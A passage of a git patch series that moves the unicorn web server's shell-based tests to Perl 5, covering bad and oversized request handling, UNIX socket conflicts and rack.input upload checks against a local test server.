-#!/bin/sh
-. ./test-lib.sh
-t_plan 11 "parser error test"
-
-t_begin "setup and startup" && {
-	unicorn_setup
-	unicorn -D env.ru -c $unicorn_config
-	unicorn_wait_start
-}
-
-t_begin "send a bad request" && {
-	(
-		printf 'GET / HTTP/1/1\r\nHost: example.com\r\n\r\n'
-		cat $fifo > $tmp &
-		wait
-		echo ok > $ok
-	) | socat - TCP:$listen > $fifo
-	test xok = x$(cat $ok)
-}
-
-dbgcat tmp
-
-t_begin "response should be a 400" && {
-	grep -F 'HTTP/1.1 400 Bad Request' $tmp
-}
-
-t_begin "send a huge Request URI (REQUEST_PATH > (12 * 1024))" && {
-	rm -f $tmp
-	cat $fifo > $tmp &
-	(
-		set -e
-		trap 'echo ok > $ok' EXIT
-		printf 'GET /'
-		for i in $(awk </dev/null 'BEGIN{for(i=0;i<1024;i++) print i}')
-		do
-			printf '0123456789ab'
-		done
-		printf ' HTTP/1.1\r\nHost: example.com\r\n\r\n'
-	) | socat - TCP:$listen > $fifo || :
-	test xok = x$(cat $ok)
-	wait
-}
-
-t_begin "response should be a 414 (REQUEST_PATH)" && {
-	grep -F 'HTTP/1.1 414 ' $tmp
-}
-
-t_begin "send a huge Request URI (QUERY_STRING > (10 * 1024))" && {
-	rm -f $tmp
-	cat $fifo > $tmp &
-	(
-		set -e
-		trap 'echo ok > $ok' EXIT
-		printf 'GET /hello-world?a'
-		for i in $(awk </dev/null 'BEGIN{for(i=0;i<1024;i++) print i}')
-		do
-			printf '0123456789'
-		done
-		printf ' HTTP/1.1\r\nHost: example.com\r\n\r\n'
-	) | socat - TCP:$listen > $fifo || :
-	test xok = x$(cat $ok)
-	wait
-}
-
-t_begin "response should be a 414 (QUERY_STRING)" && {
-	grep -F 'HTTP/1.1 414 ' $tmp
-}
-
-t_begin "send a huge Request URI (FRAGMENT > 1024)" && {
-	rm -f $tmp
-	cat $fifo > $tmp &
-	(
-		set -e
-		trap 'echo ok > $ok' EXIT
-		printf 'GET /hello-world#a'
-		for i in $(awk </dev/null 'BEGIN{for(i=0;i<64;i++) print i}')
-		do
-			printf '0123456789abcdef'
-		done
-		printf ' HTTP/1.1\r\nHost: example.com\r\n\r\n'
-	) | socat - TCP:$listen > $fifo || :
-	test xok = x$(cat $ok)
-	wait
-}
-
-t_begin "response should be a 414 (FRAGMENT)" && {
-	grep -F 'HTTP/1.1 414 ' $tmp
-}
-
-t_begin "server stderr should be clean" && check_stderr
-
-t_begin "term signal sent" && kill $unicorn_pid
-
-t_done

[-- Attachment #7: 0006-t-integration.t-use-start_req-to-simplify-test-sligh.patch --]
[-- Type: text/x-diff, Size: 2556 bytes --]

From 0bb06cc0c8c4f5b76514858067bbb2871dda0d6e Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:35 +0000
Subject: [PATCH 06/23] t/integration.t: use start_req to simplify test slighly

Less code is usually better.
---
 t/integration.t | 18 ++++++------------
 1 file changed, 6 insertions(+), 12 deletions(-)

diff --git a/t/integration.t b/t/integration.t
index 503b7eb..b7ba1fb 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -20,8 +20,7 @@ sub slurp_hdr {
 my ($c, $status, $hdr);
 
 # response header tests
-$c = tcp_connect($srv);
-print $c "GET /rack-2-newline-headers HTTP/1.0\r\n\r\n" or die $!;
+$c = start_req($srv, 'GET /rack-2-newline-headers HTTP/1.0');
 ($status, $hdr) = slurp_hdr($c);
 like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid');
 my $orig_200_status = $status;
@@ -40,8 +39,7 @@ SKIP: { # Date header check
 };
 
 
-$c = tcp_connect($srv);
-print $c "GET /rack-3-array-headers HTTP/1.0\r\n\r\n" or die $!;
+$c = start_req($srv, 'GET /rack-3-array-headers HTTP/1.0');
 ($status, $hdr) = slurp_hdr($c);
 is_deeply([ grep(/^x-r3: /, @$hdr) ],
 	[ 'x-r3: a', 'x-r3: b', 'x-r3: c' ],
@@ -49,8 +47,7 @@ is_deeply([ grep(/^x-r3: /, @$hdr) ],
 
 SKIP: {
 	eval { require JSON::PP } or skip "JSON::PP missing: $@", 1;
-	$c = tcp_connect($srv);
-	print $c "GET /env_dump\r\n" or die $!;
+	my $c = start_req($srv, 'GET /env_dump');
 	my $json = do { local $/; readline($c) };
 	unlike($json, qr/^Connection: /smi, 'no connection header for 0.9');
 	unlike($json, qr!\AHTTP/!s, 'no HTTP/1.x prefix for 0.9');
@@ -60,20 +57,17 @@ SKIP: {
 }
 
 # cf. <CAO47=rJa=zRcLn_Xm4v2cHPr6c0UswaFC_omYFEH+baSxHOWKQ@mail.gmail.com>
-$c = tcp_connect($srv);
-print $c "GET /nil-header-value HTTP/1.0\r\n\r\n" or die $!;
+$c = start_req($srv, 'GET /nil-header-value HTTP/1.0');
 ($status, $hdr) = slurp_hdr($c);
 is_deeply([grep(/^X-Nil:/, @$hdr)], ['X-Nil: '],
 	'nil header value accepted for broken apps') or diag(explain($hdr));
 
 if ('TODO: ensure Rack::Utils::HTTP_STATUS_CODES is available') {
-	$c = tcp_connect($srv);
-	print $c "POST /tweak-status-code HTTP/1.0\r\n\r\n" or die $!;
+	$c = start_req($srv, 'POST /tweak-status-code HTTP/1.0');
 	($status, $hdr) = slurp_hdr($c);
 	like($status, qr!\AHTTP/1\.[01] 200 HI\b!, 'status tweaked');
 
-	$c = tcp_connect($srv);
-	print $c "POST /restore-status-code HTTP/1.0\r\n\r\n" or die $!;
+	$c = start_req($srv, 'POST /restore-status-code HTTP/1.0');
 	($status, $hdr) = slurp_hdr($c);
 	is($status, $orig_200_status, 'original status restored');
 }

[-- Attachment #8: 0007-port-t0011-active-unix-socket.sh-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 6945 bytes --]

From 10c83beaca58df8b92d8228e798559069cd89beb Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:36 +0000
Subject: [PATCH 07/23] port t0011-active-unix-socket.sh to Perl 5

Another socat dependency down...  I've also started turning
FD_CLOEXEC off on a pipe as a mechanism to detect daemonized
process death in tests.
---
 t/active-unix-socket.t        | 117 ++++++++++++++++++++++++++++++++++
 t/integration.ru              |   1 +
 t/t0011-active-unix-socket.sh |  79 -----------------------
 3 files changed, 118 insertions(+), 79 deletions(-)
 create mode 100644 t/active-unix-socket.t
 delete mode 100755 t/t0011-active-unix-socket.sh

diff --git a/t/active-unix-socket.t b/t/active-unix-socket.t
new file mode 100644
index 0000000..6b5c218
--- /dev/null
+++ b/t/active-unix-socket.t
@@ -0,0 +1,117 @@
+#!perl -w
+# Copyright (C) unicorn hackers <unicorn-public@yhbt.net>
+# License: GPL-3.0+ <https://www.gnu.org/licenses/gpl-3.0.txt>
+
+use v5.14; BEGIN { require './t/lib.perl' };
+use IO::Socket::UNIX;
+my %to_kill;
+END { kill('TERM', values(%to_kill)) if keys %to_kill }
+my $u1 = "$tmpdir/u1.sock";
+my $u2 = "$tmpdir/u2.sock";
+my $unix_req = sub {
+	my $s = IO::Socket::UNIX->new(Peer => shift, Type => SOCK_STREAM);
+	print $s @_, "\r\n\r\n" or die $!;
+	$s;
+};
+{
+	use autodie;
+	open my $fh, '>', "$tmpdir/u1.conf.rb";
+	print $fh <<EOM;
+pid "$tmpdir/u.pid"
+listen "$u1"
+stderr_path "$tmpdir/err1.log"
+EOM
+	close $fh;
+
+	open $fh, '>', "$tmpdir/u2.conf.rb";
+	print $fh <<EOM;
+pid "$tmpdir/u.pid"
+listen "$u2"
+stderr_path "$tmpdir/err2.log"
+EOM
+	close $fh;
+
+	open $fh, '>', "$tmpdir/u3.conf.rb";
+	print $fh <<EOM;
+pid "$tmpdir/u3.pid"
+listen "$u1"
+stderr_path "$tmpdir/err3.log"
+EOM
+	close $fh;
+}
+
+my @uarg = qw(-D -E none t/integration.ru);
+
+# this pipe will be used to notify us when all daemons die:
+pipe(my ($p0, $p1)) or die "pipe: $!";
+fcntl($p1, POSIX::F_SETFD, 0) or die "fcntl: $!"; # clear FD_CLOEXEC
+
+# start the first instance
+unicorn('-c', "$tmpdir/u1.conf.rb", @uarg)->join;
+is($?, 0, 'daemonized 1st process');
+chomp($to_kill{u1} = slurp("$tmpdir/u.pid"));
+like($to_kill{u1}, qr/\A\d+\z/s, 'read pid file');
+
+chomp(my $worker_pid = readline($unix_req->($u1, 'GET /pid')));
+like($worker_pid, qr/\A\d+\z/s, 'captured worker pid');
+ok(kill(0, $worker_pid), 'worker is kill-able');
+
+
+# 2nd process conflicts on PID
+unicorn('-c', "$tmpdir/u2.conf.rb", @uarg)->join;
+isnt($?, 0, 'conflicting PID file fails to start');
+
+chomp(my $pidf = slurp("$tmpdir/u.pid"));
+is($pidf, $to_kill{u1}, 'pid file contents unchanged after start failure');
+
+chomp(my $pid2 = readline($unix_req->($u1, 'GET /pid')));
+is($worker_pid, $pid2, 'worker PID unchanged');
+
+
+# 3rd process conflicts on socket
+unicorn('-c', "$tmpdir/u3.conf.rb", @uarg)->join;
+isnt($?, 0, 'conflicting UNIX socket fails to start');
+
+chomp($pid2 = readline($unix_req->($u1, 'GET /pid')));
+is($worker_pid, $pid2, 'worker PID still unchanged');
+
+chomp($pidf = slurp("$tmpdir/u.pid"));
+is($pidf, $to_kill{u1}, 'pid file contents unchanged after 2nd start failure');
+
+{ # teardown initial process via SIGKILL
+	ok(kill('KILL', delete $to_kill{u1}), 'SIGKILL initial daemon');
+	close $p1;
+	vec(my $rvec = '', fileno($p0), 1) = 1;
+	is(select($rvec, undef, undef, 5), 1, 'timeout for pipe HUP');
+	is(my $undef = <$p0>, undef, 'process closed pipe writer at exit');
+	ok(-f "$tmpdir/u.pid", 'pid file stayed after SIGKILL');
+	ok(-S $u1, 'socket stayed after SIGKILL');
+	is(IO::Socket::UNIX->new(Peer => $u1, Type => SOCK_STREAM), undef,
+		'fail to connect to u1');
+	ok(!kill(0, $worker_pid), 'worker gone after parent dies');
+}
+
+# restart the first instance
+{
+	pipe(($p0, $p1)) or die "pipe: $!";
+	fcntl($p1, POSIX::F_SETFD, 0) or die "fcntl: $!"; # clear FD_CLOEXEC
+	unicorn('-c', "$tmpdir/u1.conf.rb", @uarg)->join;
+	is($?, 0, 'daemonized 1st process');
+	chomp($to_kill{u1} = slurp("$tmpdir/u.pid"));
+	like($to_kill{u1}, qr/\A\d+\z/s, 'read pid file');
+
+	chomp($pid2 = readline($unix_req->($u1, 'GET /pid')));
+	like($pid2, qr/\A\d+\z/, 'worker running');
+
+	ok(kill('TERM', delete $to_kill{u1}), 'SIGTERM restarted daemon');
+	close $p1;
+	vec(my $rvec = '', fileno($p0), 1) = 1;
+	is(select($rvec, undef, undef, 5), 1, 'timeout for pipe HUP');
+	is(my $undef = <$p0>, undef, 'process closed pipe writer at exit');
+	ok(!-f "$tmpdir/u.pid", 'pid file gone after SIGTERM');
+	ok(-S $u1, 'socket stays after SIGTERM');
+}
+
+my @log = slurp("$tmpdir/err.log");
+diag("@log") if $ENV{V};
+done_testing;
diff --git a/t/integration.ru b/t/integration.ru
index c0bef99..21f5449 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -57,6 +57,7 @@ def env_dump(env)
     when '/unknown-status-pass-through'; [ '666 I AM THE BEAST', {}, [] ]
     when '/env_dump'; [ 200, {}, [ env_dump(env) ] ]
     when '/write_on_close'; write_on_close
+    when '/pid'; [ 200, {}, [ "#$$\n" ] ]
     end # case PATH_INFO (GET)
   when 'POST'
     case env['PATH_INFO']
diff --git a/t/t0011-active-unix-socket.sh b/t/t0011-active-unix-socket.sh
deleted file mode 100755
index fae0b6c..0000000
--- a/t/t0011-active-unix-socket.sh
+++ /dev/null
@@ -1,79 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-t_plan 11 "existing UNIX domain socket check"
-
-read_pid_unix () {
-	x=$(printf 'GET / HTTP/1.0\r\n\r\n' | \
-	    socat - UNIX:$unix_socket | \
-	    tail -1)
-	test -n "$x"
-	y="$(expr "$x" : '\([0-9][0-9]*\)')"
-	test x"$x" = x"$y"
-	test -n "$y"
-	echo "$y"
-}
-
-t_begin "setup and start" && {
-	rtmpfiles unix_socket unix_config
-	rm -f $unix_socket
-	unicorn_setup
-	grep -v ^listen < $unicorn_config > $unix_config
-	echo "listen '$unix_socket'" >> $unix_config
-	unicorn -D -c $unix_config pid.ru
-	unicorn_wait_start
-	orig_master_pid=$unicorn_pid
-}
-
-t_begin "get pid of worker" && {
-	worker_pid=$(read_pid_unix)
-	t_info "worker_pid=$worker_pid"
-}
-
-t_begin "fails to start with existing pid file" && {
-	rm -f $ok
-	unicorn -D -c $unix_config pid.ru || echo ok > $ok
-	test x"$(cat $ok)" = xok
-}
-
-t_begin "worker pid unchanged" && {
-	test x"$(read_pid_unix)" = x$worker_pid
-	> $r_err
-}
-
-t_begin "fails to start with listening UNIX domain socket bound" && {
-	rm $ok $pid
-	unicorn -D -c $unix_config pid.ru || echo ok > $ok
-	test x"$(cat $ok)" = xok
-	> $r_err
-}
-
-t_begin "worker pid unchanged (again)" && {
-	test x"$(read_pid_unix)" = x$worker_pid
-}
-
-t_begin "nuking the existing Unicorn succeeds" && {
-	kill -9 $unicorn_pid
-	while kill -0 $unicorn_pid
-	do
-		sleep 1
-	done
-	check_stderr
-}
-
-t_begin "succeeds in starting with leftover UNIX domain socket bound" && {
-	test -S $unix_socket
-	unicorn -D -c $unix_config pid.ru
-	unicorn_wait_start
-}
-
-t_begin "worker pid changed" && {
-	test x"$(read_pid_unix)" != x$worker_pid
-}
-
-t_begin "killing succeeds" && {
-	kill $unicorn_pid
-}
-
-t_begin "no errors" && check_stderr
-
-t_done

[-- Attachment #9: 0008-port-t0100-rack-input-tests.sh-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 11722 bytes --]

From b4ed148186295f2d5c8448eab7f2b201615d1e4e Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:37 +0000
Subject: [PATCH 08/23] port t0100-rack-input-tests.sh to Perl 5

Yet another socat dependency gone \o/
---
 t/bin/content-md5-put       |  36 -----------
 t/integration.ru            |  27 +++++++-
 t/integration.t             |  97 +++++++++++++++++++++++++++-
 t/lib.perl                  |   3 +-
 t/rack-input-tests.ru       |  21 ------
 t/t0100-rack-input-tests.sh | 124 ------------------------------------
 6 files changed, 124 insertions(+), 184 deletions(-)
 delete mode 100755 t/bin/content-md5-put
 delete mode 100644 t/rack-input-tests.ru
 delete mode 100755 t/t0100-rack-input-tests.sh

diff --git a/t/bin/content-md5-put b/t/bin/content-md5-put
deleted file mode 100755
index 01da0bb..0000000
--- a/t/bin/content-md5-put
+++ /dev/null
@@ -1,36 +0,0 @@
-#!/usr/bin/env ruby
-# -*- encoding: binary -*-
-# simple chunked HTTP PUT request generator (and just that),
-# it reads stdin and writes to stdout so socat can write to a
-# UNIX or TCP socket (or to another filter or file) along with
-# a Content-MD5 trailer.
-require 'digest/md5'
-$stdout.sync = $stderr.sync = true
-$stdout.binmode
-$stdin.binmode
-
-bs = ENV['bs'] ? ENV['bs'].to_i : 4096
-
-if ARGV.grep("--no-headers").empty?
-  $stdout.write(
-      "PUT / HTTP/1.1\r\n" \
-      "Host: example.com\r\n" \
-      "Transfer-Encoding: chunked\r\n" \
-      "Trailer: Content-MD5\r\n" \
-      "\r\n"
-    )
-end
-
-digest = Digest::MD5.new
-if buf = $stdin.readpartial(bs)
-  begin
-    digest.update(buf)
-    $stdout.write("%x\r\n" % [ buf.size ])
-    $stdout.write(buf)
-    $stdout.write("\r\n")
-  end while $stdin.read(bs, buf)
-end
-
-digest = [ digest.digest ].pack('m').strip
-$stdout.write("0\r\n")
-$stdout.write("Content-MD5: #{digest}\r\n\r\n")
diff --git a/t/integration.ru b/t/integration.ru
index 21f5449..98528f6 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -47,6 +47,29 @@ def env_dump(env)
   h.to_json
 end
 
+def rack_input_tests(env)
+  return [ 100, {}, [] ] if /\A100-continue\z/i =~ env['HTTP_EXPECT']
+  cap = 16384
+  require 'digest/sha1'
+  digest = Digest::SHA1.new
+  input = env['rack.input']
+  case env['PATH_INFO']
+  when '/rack_input/size_first'; input.size
+  when '/rack_input/rewind_first'; input.rewind
+  when '/rack_input'; # OK
+  else
+    abort "bad path: #{env['PATH_INFO']}"
+  end
+  if buf = input.read(rand(cap))
+    begin
+      raise "#{buf.size} > #{cap}" if buf.size > cap
+      digest.update(buf)
+    end while input.read(rand(cap), buf)
+  end
+  [ 200, {'content-length' => '40', 'content-type' => 'text/plain'},
+    [ digest.hexdigest ] ]
+end
+
 run(lambda do |env|
   case env['REQUEST_METHOD']
   when 'GET'
@@ -66,6 +89,8 @@ def env_dump(env)
     end # case PATH_INFO (POST)
     # ...
   when 'PUT'
-    # ...
+    case env['PATH_INFO']
+    when %r{\A/rack_input}; rack_input_tests(env)
+    end
   end # case REQUEST_METHOD
 end) # run
diff --git a/t/integration.t b/t/integration.t
index b7ba1fb..8cef561 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -1,13 +1,16 @@
 #!perl -w
 # Copyright (C) unicorn hackers <unicorn-public@yhbt.net>
 # License: GPL-3.0+ <https://www.gnu.org/licenses/gpl-3.0.txt>
+# this is the main integration test for things which don't require
+# restarting or signals
 
 use v5.14; BEGIN { require './t/lib.perl' };
 my $srv = tcp_server();
 my $host_port = tcp_host_port($srv);
 my $t0 = time;
 my $ar = unicorn(qw(-E none t/integration.ru), { 3 => $srv });
-
+my $curl = which('curl');
+END { diag slurp("$tmpdir/err.log") if $tmpdir };
 sub slurp_hdr {
 	my ($c) = @_;
 	local $/ = "\r\n\r\n"; # affects both readline+chomp
@@ -17,6 +20,48 @@ sub slurp_hdr {
 	($status, \@hdr);
 }
 
+my %PUT = (
+	chunked_md5 => sub {
+		my ($in, $out, $path, %opt) = @_;
+		my $bs = $opt{bs} // 16384;
+		require Digest::MD5;
+		my $dig = Digest::MD5->new;
+		print $out <<EOM;
+PUT $path HTTP/1.1\r
+Transfer-Encoding: chunked\r
+Trailer: Content-MD5\r
+\r
+EOM
+		my ($buf, $r);
+		while (1) {
+			$r = read($in, $buf, $bs) // die "read: $!";
+			last if $r == 0;
+			printf $out "%x\r\n", length($buf);
+			print $out $buf, "\r\n";
+			$dig->add($buf);
+		}
+		print $out "0\r\nContent-MD5: ", $dig->b64digest, "\r\n\r\n";
+	},
+	identity => sub {
+		my ($in, $out, $path, %opt) = @_;
+		my $bs = $opt{bs} // 16384;
+		my $clen = $opt{-s} // -s $in;
+		print $out <<EOM;
+PUT $path HTTP/1.0\r
+Content-Length: $clen\r
+\r
+EOM
+		my ($buf, $r, $len);
+		while ($clen) {
+			$len = $clen > $bs ? $bs : $clen;
+			$r = read($in, $buf, $len) // die "read: $!";
+			die 'premature EOF' if $r == 0;
+			print $out $buf;
+			$clen -= $r;
+		}
+	},
+);
+
 my ($c, $status, $hdr);
 
 # response header tests
@@ -111,6 +156,55 @@ if ('bad requests') {
 	like($status, qr!\AHTTP/1\.[01] 414 \b!, '414 on FRAGMENT > (1024)');
 }
 
+# input tests
+my ($blob_size, $blob_hash);
+SKIP: {
+	open(my $rh, '<', 't/random_blob') or
+		skip "t/random_blob not generated $!", 1;
+	$blob_size = -s $rh;
+	require Digest::SHA;
+	$blob_hash = Digest::SHA->new(1)->addfile($rh)->hexdigest;
+
+	my $ck_hash = sub {
+		my ($sub, $path, %opt) = @_;
+		seek($rh, 0, SEEK_SET) // die "seek: $!";
+		$c = tcp_connect($srv);
+		$c->autoflush(0);
+		$PUT{$sub}->($rh, $c, $path, %opt);
+		$c->flush or die "flush: $!";
+		($status, $hdr) = slurp_hdr($c);
+		is(readline($c), $blob_hash, "$sub $path");
+	};
+	$ck_hash->('identity', '/rack_input', -s => $blob_size);
+	$ck_hash->('chunked_md5', '/rack_input');
+	$ck_hash->('identity', '/rack_input/size_first', -s => $blob_size);
+	$ck_hash->('identity', '/rack_input/rewind_first', -s => $blob_size);
+	$ck_hash->('chunked_md5', '/rack_input/size_first');
+	$ck_hash->('chunked_md5', '/rack_input/rewind_first');
+
+
+	$curl // skip 'no curl found in PATH', 1;
+
+	my ($copt, $cout);
+	my $url = "http://$host_port/rack_input";
+	my $do_curl = sub {
+		my (@arg) = @_;
+		pipe(my $cout, $copt->{1}) or die "pipe: $!";
+		open $copt->{2}, '>', "$tmpdir/curl.err" or die $!;
+		my $cpid = spawn($curl, '-sSf', @arg, $url, $copt);
+		close(delete $copt->{1}) or die "close: $!";
+		is(readline($cout), $blob_hash, "curl @arg response");
+		is(waitpid($cpid, 0), $cpid, "curl @arg exited");
+		is($?, 0, "no error from curl @arg");
+		is(slurp("$tmpdir/curl.err"), '', "no stderr from curl @arg");
+	};
+
+	$do_curl->(qw(-T t/random_blob));
+
+	seek($rh, 0, SEEK_SET) // die "seek: $!";
+	$copt->{0} = $rh;
+	$do_curl->('-T-');
+}
 
 # ... more stuff here
 undef $ar;
@@ -120,4 +214,5 @@ my @err = grep(!/NameError.*Unicorn::Waiter/, grep(/error/i, @log));
 is_deeply(\@err, [], 'no unexpected errors in stderr');
 is_deeply([grep(/SIGKILL/, @log)], [], 'no SIGKILL in stderr');
 
+undef $tmpdir;
 done_testing;
diff --git a/t/lib.perl b/t/lib.perl
index 7d712b5..ae9f197 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -10,7 +10,7 @@ use POSIX qw(dup2 _exit setpgid :signal_h SEEK_SET F_SETFD);
 use File::Temp 0.19 (); # 0.19 for ->newdir
 our ($tmpdir, $errfh);
 our @EXPORT = qw(unicorn slurp tcp_server tcp_connect unicorn $tmpdir $errfh
-	SEEK_SET tcp_host_port start_req);
+	SEEK_SET tcp_host_port start_req which spawn);
 
 my ($base) = ($0 =~ m!\b([^/]+)\.[^\.]+\z!);
 $tmpdir = File::Temp->newdir("unicorn-$base-XXXX", TMPDIR => 1);
@@ -193,4 +193,5 @@ Test::More->import;
 # try to ensure ->DESTROY fires:
 $SIG{TERM} = sub { exit(15 + 128) };
 $SIG{INT} = sub { exit(2 + 128) };
+$SIG{PIPE} = sub { exit(13 + 128) };
 1;
diff --git a/t/rack-input-tests.ru b/t/rack-input-tests.ru
deleted file mode 100644
index 5459e85..0000000
--- a/t/rack-input-tests.ru
+++ /dev/null
@@ -1,21 +0,0 @@
-# SHA1 checksum generator
-require 'digest/sha1'
-use Rack::ContentLength
-cap = 16384
-app = lambda do |env|
-  /\A100-continue\z/i =~ env['HTTP_EXPECT'] and
-    return [ 100, {}, [] ]
-  digest = Digest::SHA1.new
-  input = env['rack.input']
-  input.size if env["PATH_INFO"] == "/size_first"
-  input.rewind if env["PATH_INFO"] == "/rewind_first"
-  if buf = input.read(rand(cap))
-    begin
-      raise "#{buf.size} > #{cap}" if buf.size > cap
-      digest.update(buf)
-    end while input.read(rand(cap), buf)
-  end
-
-  [ 200, {'content-type' => 'text/plain'}, [ digest.hexdigest << "\n" ] ]
-end
-run app
diff --git a/t/t0100-rack-input-tests.sh b/t/t0100-rack-input-tests.sh
deleted file mode 100755
index ee7a437..0000000
--- a/t/t0100-rack-input-tests.sh
+++ /dev/null
@@ -1,124 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-test -r random_blob || die "random_blob required, run with 'make $0'"
-
-t_plan 10 "rack.input read tests"
-
-t_begin "setup and startup" && {
-	rtmpfiles curl_out curl_err
-	unicorn_setup
-	unicorn -E none -D rack-input-tests.ru -c $unicorn_config
-	blob_sha1=$(rsha1 < random_blob)
-	blob_size=$(count_bytes < random_blob)
-	t_info "blob_sha1=$blob_sha1"
-	unicorn_wait_start
-}
-
-t_begin "corked identity request" && {
-	rm -f $tmp
-	(
-		cat $fifo > $tmp &
-		printf 'PUT / HTTP/1.0\r\n'
-		printf 'Content-Length: %d\r\n\r\n' $blob_size
-		cat random_blob
-		wait
-		echo ok > $ok
-	) | ( sleep 1 && socat - TCP4:$listen > $fifo )
-	test 1 -eq $(grep $blob_sha1 $tmp |count_lines)
-	test x"$(cat $ok)" = xok
-}
-
-t_begin "corked chunked request" && {
-	rm -f $tmp
-	(
-		cat $fifo > $tmp &
-		content-md5-put < random_blob
-		wait
-		echo ok > $ok
-	) | ( sleep 1 && socat - TCP4:$listen > $fifo )
-	test 1 -eq $(grep $blob_sha1 $tmp |count_lines)
-	test x"$(cat $ok)" = xok
-}
-
-t_begin "corked identity request (input#size first)" && {
-	rm -f $tmp
-	(
-		cat $fifo > $tmp &
-		printf 'PUT /size_first HTTP/1.0\r\n'
-		printf 'Content-Length: %d\r\n\r\n' $blob_size
-		cat random_blob
-		wait
-		echo ok > $ok
-	) | ( sleep 1 && socat - TCP4:$listen > $fifo )
-	test 1 -eq $(grep $blob_sha1 $tmp |count_lines)
-	test x"$(cat $ok)" = xok
-}
-
-t_begin "corked identity request (input#rewind first)" && {
-	rm -f $tmp
-	(
-		cat $fifo > $tmp &
-		printf 'PUT /rewind_first HTTP/1.0\r\n'
-		printf 'Content-Length: %d\r\n\r\n' $blob_size
-		cat random_blob
-		wait
-		echo ok > $ok
-	) | ( sleep 1 && socat - TCP4:$listen > $fifo )
-	test 1 -eq $(grep $blob_sha1 $tmp |count_lines)
-	test x"$(cat $ok)" = xok
-}
-
-t_begin "corked chunked request (input#size first)" && {
-	rm -f $tmp
-	(
-		cat $fifo > $tmp &
-		printf 'PUT /size_first HTTP/1.1\r\n'
-		printf 'Host: example.com\r\n'
-		printf 'Transfer-Encoding: chunked\r\n'
-		printf 'Trailer: Content-MD5\r\n'
-		printf '\r\n'
-		content-md5-put --no-headers < random_blob
-		wait
-		echo ok > $ok
-	) | ( sleep 1 && socat - TCP4:$listen > $fifo )
-	test 1 -eq $(grep $blob_sha1 $tmp |count_lines)
-	test 1 -eq $(grep $blob_sha1 $tmp |count_lines)
-	test x"$(cat $ok)" = xok
-}
-
-t_begin "corked chunked request (input#rewind first)" && {
-	rm -f $tmp
-	(
-		cat $fifo > $tmp &
-		printf 'PUT /rewind_first HTTP/1.1\r\n'
-		printf 'Host: example.com\r\n'
-		printf 'Transfer-Encoding: chunked\r\n'
-		printf 'Trailer: Content-MD5\r\n'
-		printf '\r\n'
-		content-md5-put --no-headers < random_blob
-		wait
-		echo ok > $ok
-	) | ( sleep 1 && socat - TCP4:$listen > $fifo )
-	test 1 -eq $(grep $blob_sha1 $tmp |count_lines)
-	test x"$(cat $ok)" = xok
-}
-
-t_begin "regular request" && {
-	curl -sSf -T random_blob http://$listen/ > $curl_out 2> $curl_err
-        test x$blob_sha1 = x$(cat $curl_out)
-        test ! -s $curl_err
-}
-
-t_begin "chunked request" && {
-	curl -sSf -T- < random_blob http://$listen/ > $curl_out 2> $curl_err
-        test x$blob_sha1 = x$(cat $curl_out)
-        test ! -s $curl_err
-}
-
-dbgcat r_err
-
-t_begin "shutdown" && {
-	kill $unicorn_pid
-}
-
-t_done

[-- Attachment #10: 0009-tests-use-autodie-to-simplify-error-checking.patch --]
[-- Type: text/x-diff, Size: 8495 bytes --]

From 3a1d015a3859b639d8e4463e9436a49f4f0f720e Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:38 +0000
Subject: [PATCH 09/23] tests: use autodie to simplify error checking

autodie is bundled with Perl 5.10+ and simplifies error
checking in most cases.  Some subroutines aren't perfectly
translatable and their call sites had to be tweaked, but
most of them are.
---
 t/active-unix-socket.t | 13 +++++++------
 t/integration.t        | 37 +++++++++++++++++++------------------
 t/lib.perl             | 30 +++++++++++++++---------------
 3 files changed, 41 insertions(+), 39 deletions(-)

diff --git a/t/active-unix-socket.t b/t/active-unix-socket.t
index 6b5c218..1241904 100644
--- a/t/active-unix-socket.t
+++ b/t/active-unix-socket.t
@@ -4,17 +4,18 @@
 
 use v5.14; BEGIN { require './t/lib.perl' };
 use IO::Socket::UNIX;
+use autodie;
+no autodie 'kill';
 my %to_kill;
 END { kill('TERM', values(%to_kill)) if keys %to_kill }
 my $u1 = "$tmpdir/u1.sock";
 my $u2 = "$tmpdir/u2.sock";
 my $unix_req = sub {
 	my $s = IO::Socket::UNIX->new(Peer => shift, Type => SOCK_STREAM);
-	print $s @_, "\r\n\r\n" or die $!;
+	print $s @_, "\r\n\r\n";
 	$s;
 };
 {
-	use autodie;
 	open my $fh, '>', "$tmpdir/u1.conf.rb";
 	print $fh <<EOM;
 pid "$tmpdir/u.pid"
@@ -43,8 +44,8 @@ EOM
 my @uarg = qw(-D -E none t/integration.ru);
 
 # this pipe will be used to notify us when all daemons die:
-pipe(my ($p0, $p1)) or die "pipe: $!";
-fcntl($p1, POSIX::F_SETFD, 0) or die "fcntl: $!"; # clear FD_CLOEXEC
+pipe(my $p0, my $p1);
+fcntl($p1, POSIX::F_SETFD, 0);
 
 # start the first instance
 unicorn('-c', "$tmpdir/u1.conf.rb", @uarg)->join;
@@ -93,8 +94,8 @@ is($pidf, $to_kill{u1}, 'pid file contents unchanged after 2nd start failure');
 
 # restart the first instance
 {
-	pipe(($p0, $p1)) or die "pipe: $!";
-	fcntl($p1, POSIX::F_SETFD, 0) or die "fcntl: $!"; # clear FD_CLOEXEC
+	pipe($p0, $p1);
+	fcntl($p1, POSIX::F_SETFD, 0);
 	unicorn('-c', "$tmpdir/u1.conf.rb", @uarg)->join;
 	is($?, 0, 'daemonized 1st process');
 	chomp($to_kill{u1} = slurp("$tmpdir/u.pid"));
diff --git a/t/integration.t b/t/integration.t
index 8cef561..af17d51 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -5,6 +5,7 @@
 # restarting or signals
 
 use v5.14; BEGIN { require './t/lib.perl' };
